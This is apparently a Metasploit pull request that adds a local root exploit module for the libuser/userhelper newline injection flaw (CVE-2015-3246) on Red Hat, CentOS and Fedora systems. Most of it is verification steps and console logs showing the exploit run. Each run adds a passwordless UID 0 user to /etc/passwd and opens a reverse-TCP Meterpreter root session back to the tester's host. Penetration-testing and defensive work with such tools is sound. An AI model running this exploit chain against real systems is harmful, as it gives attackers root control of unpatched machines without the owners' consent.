### PR TITLE
Add Libuser roothelper Privilege Escalation exploit

### PR DESCRIPTION
**Pull request by bcoles**
Add Libuser roothelper Privilege Escalation exploit.

        This module attempts to gain root privileges on Red Hat based Linux
        systems, including RHEL, Fedora and CentOS, by exploiting a newline
        injection vulnerability in libuser and userhelper versions prior to
        0.56.13-8 and version 0.60 before 0.60-7.

        This module makes use of the roothelper.c exploit from Qualys to
        insert a new user with UID=0 in /etc/passwd.

        Note, the password for the current user is required by userhelper.

        Note, on some systems, such as Fedora 11, the user entry for the
        current user in /etc/passwd will become corrupted and exploitation
        will fail.

        This module has been tested successfully on libuser packaged versions
        0.56.13-4.el6 on CentOS 6.0 (x86_64);
        0.56.13-5.el6 on CentOS 6.5 (x86_64);
        0.60-5.el7 on CentOS 7.1-1503 (x86_64);
        0.56.16-1.fc13 on Fedora 13 (i686);
        0.59-1.fc19 on Fedora Desktop 19 (x86_64);
        0.60-6.fc21 on Fedora Desktop 21 (x86_64);
        0.56.13-5.el6 on Red Hat 6.6 (x86_64); and
        0.60-5.el7 on Red Hat 7.0 (x86_64).

        RHEL 5 is vulnerable, however the installed version of glibc (2.5)
        is missing various functions required by roothelper.c.

## Verification

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use exploit/linux/local/libuser_roothelper_priv_esc`
- [x] `set SESSION <ID>`
- [x] `set PASSWORD <PASSWORD>`
- [x] `run`
- [x] **Verify** you get a *root* session

### libuser 0.56.13-5.el6 on Red Hat 6.6 (x86_64)

```
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password
password => password
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.QQ4pE9nj.c' (29342 bytes) ...
[*] Launching roothelper exploit (Timeout: 180)...
[+] Success! User 'a' added to /etc/passwd
[*] Writing '/tmp/.SJAEHS' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.245
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.245:46065) at 2018-04-23 13:08:51 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 6 (Linux 2.6.32-504.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

### libuser 0.60-5.el7 on CentOS 7.1-1503 (x86_64)

```
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password
password => password
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.Ake5GA' (103396 bytes) ...
[*] Launching roothelper exploit (Timeout: 180)...
[+] Success! User 'a' added to /etc/passwd
[*] Writing '/tmp/.vbahMY' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.242
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.242:48332) at 2018-04-23 13:13:22 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 7.1 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

### libuser 0.60-6.fc21 on Fedora Desktop 21 (x86_64)

```
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password
password => password
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.ByQC9FHS.c' (29342 bytes) ...
[*] Launching roothelper exploit (Timeout: 180)...
[+] Success! User 'a' added to /etc/passwd
[*] Writing '/tmp/.WnBXJkWDa' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.240
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.240:53201) at 2018-04-23 13:16:32 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 21 (Linux 3.17.4-301.fc21.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

### CODE REVIEW

**Comment by bcoles** [comment]
`roothelper` - reliable userland local root exploit for about five years worth of RHEL based distros (RHEL 5 to 7, CentOS 5 to 7, Fedora ~11 to ~22) up until around July 2015.


### Ranking

I tested the original `roothelper.c`, modified `roothelper.c`, and this exploit module with `COMPILE => False` and `COMPILE => True` on a bunch of distros. Fedora 11 was the only distro which decided to corrupt `/etc/passwd`. This is mentioned in the module description and documentation. For this reason, I chose `GreatRanking`.


### Check method

The most confident response from `check` is `CheckCode::Detected`.

**glibc**

`roothelper.c` makes use of various libc functions which weren't avilable until glibc 2.6. While I was able to work around some of these restrictions, I opted to move on out of laziness. As such, this exploit does not work on RHEL 5 by default, including the latest version (5.11). CentOS 5.x is in the same boat.

**libuser**

While it's possible to verify the installed version of `libuser` using `yum list installed libuser` I avoided this check for a few reasons. Ancient OS no longer have valid upstream package sources, causing the command to fail. Also laziness.

**pam mitigation**

Red Hat does offer a [workaround](https://access.redhat.com/articles/1537873) to prevent exploitation. I didn't bother to check for this.


### script / su

Successful exploitation results in a new user added to the system with `UID=0` and no password.

On some systems, it's possible to pipe `stdin` to `su`, however this is not the case for early versions of RHEL/CentOS/Fedora which require a TTY. As such, I opted to use `script` which is installed by default. This means that both the `check` and `exploit` methods will bail out if `script` is not in `$PATH`.

The new user is removed from the system `on_new_session`.

**Comment by bcoles** [comment]
Jenkins what are you doing?

**Comment by bcoles** [comment]
Jenkins test this please

File: modules/exploits/linux/local/libuser_roothelper_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,275 @@
...
+          [ 'CVE', '2015-3246' ],
+          [ 'BID', '76021' ],
+          [ 'BID', '76022' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],
+          [ 'URL', 'https://access.redhat.com/articles/1537873' ]
+        ],
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptString.new('PASSWORD', [ false, 'Password for the current user', '' ]),
```
[the remark this answers is not in the document]
Comment (bcoles) [reply modules/exploits/linux/local/libuser_roothelper_priv_esc.rb]: For context, while a blank password is valid, libuser does not appear to accept it.

**Comment by timwr** [comment]
Also working on shell sessions:
```
msf5 exploit(linux/local/libuser_roothelper_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               192.168.1.115:4444 -> 192.168.1.115:43150 (192.168.1.115)

msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.115:4455
[+] /usr/sbin/userhelper is setuid
[+] script is installed
[+] File /etc/passwd is not immutable
[+] GNU C Library version 2.12 is supported
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.8i5Vx' (103396 bytes) ...
[*] Max line length is 65537
[*] Writing 103396 bytes in 7 chunks of 57130 bytes (octal-encoded), using printf
[*] Next chunk is 56581 bytes
[*] Next chunk is 56845 bytes
[*] Next chunk is 47920 bytes
[*] Next chunk is 47927 bytes
[*] Next chunk is 43028 bytes
[*] Next chunk is 17822 bytes
[*] Launching roothelper exploit (Timeout: 180)...
[*] Please enter your password:
[*] Attempting to add "?::0:0::/:" to "/etc/passwd"
[*] Starting and stopping userhelper #11
[*] Starting and stopping userhelper #10
[*] Starting and stopping userhelper #9
[*] Starting and stopping userhelper #8
[*] Starting and stopping userhelper #7
[*] Starting and stopping userhelper #6
[*] Starting and stopping userhelper #5
[*] Starting and stopping userhelper #4
[*] Starting and stopping userhelper #3
[*] Starting and stopping userhelper #2
[*] Starting and stopping userhelper #1
[*] Starting and stopping userhelper #0
[*] Continuing stopped userhelper #11
[*] Continuing stopped userhelper #10
[*] Continuing stopped userhelper #9
[*] Continuing stopped userhelper #8
[*] Continuing stopped userhelper #7
[*] Continuing stopped userhelper #6
[*] Continuing stopped userhelper #5
[*] Continuing stopped userhelper #4
[*] Continuing stopped userhelper #3
[*] Continuing stopped userhelper #2
[*] Continuing stopped userhelper #1
[*] Continuing stopped userhelper #0
[*] Exploit successful, run "su a" to become root
[+] Success! User 'a' added to /etc/passwd
[*] Writing '/tmp/.4J4wa' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (853256 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.115:4455 -> 192.168.1.115:37378) at 2018-05-12 17:25:36 +0800

[+] Deleted /tmp/.4J4wa

meterpreter >
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

**Comment by timwr** [comment]
Excellent work @bcoles !!!!

**Comment by bcoles** [comment]
# Release Notes

The exploit/linux/local/libuser_roothelper_priv_esc module has been added to the framework. It allows you to gain root privileges on Red Hat based Linux systems (including RHEL, Fedora, and CentOS) by exploiting a newline injection vulnerability in libuser and userhelper.

**Pull request merged**